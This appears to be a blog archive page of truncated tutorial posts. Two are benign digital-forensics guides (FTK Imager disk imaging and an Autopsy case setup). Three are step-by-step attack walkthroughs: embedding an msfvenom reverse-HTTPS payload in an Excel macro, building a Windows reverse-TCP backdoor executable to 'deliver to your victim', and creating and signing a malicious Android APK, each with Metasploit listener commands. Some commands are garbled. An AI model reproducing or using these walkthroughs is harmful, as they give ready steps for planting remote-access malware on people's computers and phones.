Posts

Showing posts from October, 2021

How to Create Device Image File using FTK Image

Image
Step 1: Insert " Pen Drive " into the " Laptop " and then " Format " it. Step 2: Open " FTK Image Tool " and Select " Create Disk Image " From File Option. Step 3: " Select Source " Evidence Type and then  click on " Next " button. Step 4: " Select Drive " Source  and then  click on " Finish " button. Step 5: " Create Image " Page Will open and then  click on " Add " button. Step 6: " Select Image Type " page will open. Select " Image Type " (Always Select " Raw " or " SMART " ). Step 7: " Evidence Item Information " page will open. Step 8: Fill fields " Case Number, Evident Number, Unique Description, Examiner, Notes " . Step 9: Click on " Next " button. Step 10: Select " Image destination " page will open. Step 11: Give " path " into Image " destination folde...

Autopsy Case study

Image
Step 1 :    Open   " Autopsy Tool" and Select   " New Case" . Step 2 : " New case information" page will open. Step 3 :   Enter " Case Name"   and " Base Directory"   for The File to      Store. Step 4 :     Click on   " next" button . Step 5: " Option information page"   will open. Step 6:   Fill " Case Number"   and " examiner Name, Phone, Email, Notes fields" . Step 7: Click on   " Finish"   button. Step 8:   Add data source page will open. Step 9:   On "select type of data sources to add"   Select " Disk Image Or VM File Always" . Step 10: Click on   " Next" button. Step 11:    On "select data source"   Select " Path"   of Image which You Store. Step 12:    Click on   " Next" button. Step 13:   On   " configure ingest Modules" Select run ingest modules. Step 14:     Cli...

Windows Hacking Using MACRO Malware Using Metasploit

Image
Step 1: Generating payload (VBS) Open terminal in kali and execute the following command: msfvenom -p windows/meterpreter/reverse_https lhost=192.168.154.122 lport=1234 -f vba Step 2: Macros Setting. Create a new excel file and open Macros Setting. Click on micro action , then write micro name and the click on create. Microsoft visual basic page will open. Copy and paste the code generated(msfvenom) in the macro editor.                  Save the file. Step 3: Starting the Metasploit Framework Console. Open Kali terminal and start the listener in msfconsole : Step 4: Setting the payload. use exploit/multi/handler set payload windows/meterpreter/reverse_https Step 5: Provide IP & Port for backdooring. set lhost 192.168.154.122  set lport 1234 Step 6: Sending File exploiting.   exploit Step 7: Wait for victim to click your file. Execute the macro enabled excel sheet in the target system (Windows 10) When victim click and op...

How to attack Windows machine with Metasploit on Kali Linux

Image
Step 1: "Creating the Payload" To Hack Window We Need To Create A Payload That Will Act As A Backdoor For Us To Get Into That PC. To Create Payload For Windows. Open Terminal And Type      msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe - o /root/Desktop/back.exe   192.168.0.101 Is My And Ip Address And 4444 Is The Port Number That I Want To Use. Now You Will Have A New Payload File Named Newpic.exe In Root Folder.          You Need To Deliver This Malicious File To Your Victim. Step 2: "Starting The Metasploit Framework Console"  For Controlling The Payload We Need To Start The Metasploit Framework  Concole Which Is Prebuilt In Kali Linux.   To Start The Metasploit Framework Console.   In The Terminal Type " Msfconsole" . Step 3: "Choosing The Exploit Method" As I Have Said The Metasploit Framework Console Has Many Exploitation  Method.   In This We Will Use The Multi Handler. ...

Hacking Android Using Metasploit

Image
Step 1 :- Create A Payload. Using " MSFVENOM ", We Create A Payload .apk File. For This, We Use The Following Command:      msfvenom –p android/meterpreter/reverse_tcp LHOST = Localhost = 192.168.0.101 LPORT = 4444 R > RK.apk After This Command, Now You Can Locate Your File On The Desktop With The Name " RK.apk ". Step 2 :- " Keytool " Making " Keystore ".      keytool -genkey -V -keystore key.keystore -alias hacked -keyalg  RSA -keysize 2048 -validity 10000   Step 3 :- Signing A .apk File With " Jarsigner "      jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore  /home/kali/Desktop/key.keystore android_RK.apk kali   Step 4 :- Installing " Zipalign ". Zipalign Is Not Preinstalled In Kali Linux, So You Will Have To " Install " It First.      zipalign -v 4 android_shell.apk singed_jar.apk   Step 5 :- " Verifying " The .apk Into A New File Using Zipalign      zipalign -v 4 ...